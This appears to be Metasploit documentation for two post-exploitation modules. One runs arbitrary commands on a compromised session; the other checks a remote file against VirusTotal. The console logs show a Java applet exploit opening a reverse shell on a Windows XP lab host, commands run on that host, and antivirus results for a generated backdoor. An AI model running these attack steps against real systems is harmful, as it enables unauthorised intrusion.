Multiple OS Post General Modules
a11y.text Multiple OS Post General Modulesexecute
a11y.text executeThis module will execute arbitrary commands to an open session. It works on Windows, Linux, OSX, and Unix platforms.
msf post(execute) >
[*] 10.10.0.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400
msf post(execute) > show options
Module options (post/multi/general/execute):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND echo hell > file.txt no The entire command line to execute on the session
SESSION 1 yes The session to run this module on.
msf post(execute) > run
[*] Executing echo hell > file.txt on #>Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response:
[*] Post module execution completed
msf post(execute) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is 2CB7-2817
Directory of C:\Documents and Settings\administrator\Desktop
08/31/2012 09:04 AM >DIR> .
08/31/2012 09:04 AM >DIR> ..
08/31/2012 09:04 AM 46 file.txt
12/29/2011 03:52 PM 70 portlist.txt
2 File(s) 1,431 bytes
2 Dir(s) 4,899,721,216 bytes free
C:\Documents and Settings\administrator\Desktop>
malware_check
a11y.text malware_checkThis module uploads a file to virustotal.com and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX, and Unix platforms.
msf post(check_malware) > show options
Module options (post/multi/gather/check_malware):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes VirusTotal API key
REMOTEFILE C:\msfrev.exe yes A file to check from the remote machine
SESSION 1 yes The session to run this module on.
msf post(check_malware) > run
[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
AhnLab-V3 true 2015.11.26.00 Trojan/Win32.Shell 20151125
Alibaba false 1.0 20151125
Arcabit true 1.0.0.624 Trojan.Zusy.Elzob.D1F5F 20151125
Avast true 8.0.1489.320 Win32:SwPatch [Wrm] 20151125
Avira true 8.3.2.4 TR/Crypt.EPACK.Gen2 20151125
Baidu-International true 3.5.1.41473 Trojan.Win32.Rozena.AM 20151124
BitDefender true 7.2 Gen:Variant.Zusy.Elzob.8031 20151125
Bkav false 1.3.0.7383 20151125
ByteHero false 1.0.0.1 20151125
CAT-QuickHeal true 14.00 Trojan.Swrort.A 20151125
CMC false 1.1.0.977 20151124
ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
Comodo true 23654 TrojWare.Win32.Rozena.A 20151125
Cyren true 5.4.16.7 W32/Swrort.A 20151125
DrWeb true 7.0.16.10090 Trojan.Swrort.1 20151125
ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
Emsisoft true 3.5.0.642 Gen:Variant.Zusy.Elzob.8031 (B) 20151125
F-Prot true 4.7.1.166 W32/Swrort.A 20151125
F-Secure true 11.0.19100.45 Gen:Variant.Zusy.Elzob.8031 20151125
Fortinet true 5.1.220.0 W32/Swrort.C!tr 20151125
GData true 25 Gen:Variant.Zusy.Elzob.8031 20151125
Ikarus true T3.1.9.5.0 Trojan.Win32.Swrort 20151125
Jiangmin false 16.0.100 20151124
K7AntiVirus true 9.212.17966 Backdoor ( 04c53cce1 ) 20151125
K7GW true 9.212.17968 Backdoor ( 04c53cce1 ) 20151125
Kaspersky true 15.0.1.10 HEUR:Trojan.Win32.Generic 20151125
Malwarebytes true 2.1.1.1115 Backdoor.Bot.Gen 20151125
...snip...
[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe
[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
..snip..